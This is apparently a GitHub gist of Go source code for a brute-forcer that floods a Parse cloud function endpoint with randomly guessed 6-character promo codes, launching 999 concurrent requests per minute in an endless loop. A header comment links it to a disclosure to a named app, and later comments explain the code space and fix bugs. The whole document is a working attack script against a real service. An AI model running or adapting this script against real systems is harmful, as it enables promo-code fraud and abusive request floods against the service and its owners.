
@dancompton
Created February 27, 2016 01:24
simple golang bruteforcer
//used something like this in a disclosure to sauceyapp.com regarding bruteforcing
package main
import (
"bytes"
"fmt"
"io/ioutil"
"math/rand"
"net/http"
"sync"
"time"
)
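// req submits one randomly generated promo code to the applyCode cloud
// function and prints the response body to stdout.
//
// The code is 6 characters drawn from a 36-symbol alphabet, so the whole
// space is 36^6 (about 2.18 billion) values. Nothing on the client side
// limits attempts, so a code space this small is presumably protected only
// by whatever per-session or per-address attempt limiting and lockout the
// server enforces (the server side is not visible here).
//
// Errors are printed and the call returns; nothing is reported to the caller.
func req() {
	const letterBytes = "abcdefghijklmnopqrstuvwxyz1234567890"
	b := make([]byte, 6)
	for i := range b {
		b[i] = letterBytes[rand.Intn(len(letterBytes))]
	}

	url := "https://api.parse.com/1/functions/applyCode"
	// The candidate comes only from letterBytes, so it needs no JSON escaping.
	var jsonStr = []byte(`{"promoCode":"` + string(b[:6]) + `","_ApplicationId":"","_JavaScriptKey":"","_ClientVersion":"js1.3.4","_InstallationId":"","_SessionToken":""}`)

	// The local is named request so it does not shadow this function's name.
	request, err := http.NewRequest("POST", url, bytes.NewBuffer(jsonStr))
	if err != nil {
		// The original ignored this error and went on to use a nil request.
		fmt.Println(err.Error())
		return
	}
	request.Header.Set("X-Custom-Header", "myvalue")
	request.Header.Set("Content-Type", "application/json")

	client := &http.Client{}
	resp, err := client.Do(request)
	if err != nil {
		// resp is nil when Do fails, so return before touching resp.Body.
		// The original fell through and panicked on the deferred Close.
		fmt.Println(err.Error())
		return
	}
	defer resp.Body.Close()

	//fmt.Println("response Status:", resp.Status)
	//fmt.Println("response Headers:", resp.Header)
	body, err := ioutil.ReadAll(resp.Body)
	if err != nil {
		fmt.Println(err.Error())
		return
	}
	// The label says "Headers", but the value printed is the response body.
	fmt.Println("response Headers:", string(body))
}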
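// main runs req in batches forever: it starts 999 goroutines that each call
// req once, waits for all of them to finish, sleeps 60 seconds, and repeats.
// Requests within a batch are not paced (see the TODO in the loop).
func main() {
	for {
		var wg sync.WaitGroup
		for i := 1; i < 1000; i++ {
			// Add must run before the goroutine starts. The original called
			// it inside the goroutine, so Wait could see a zero counter and
			// return while requests were still in flight.
			wg.Add(1)
			go func() {
				defer wg.Done()
				req()
			}()
			// TODO(whoever)
			// https://godoc.org/?q=rate+limit
			// maybe wait here for say second/1000, use time.Ticker, but prefer to use a token bucket implementation
		}
		wg.Wait()
		time.Sleep(60 * time.Second)
	}
}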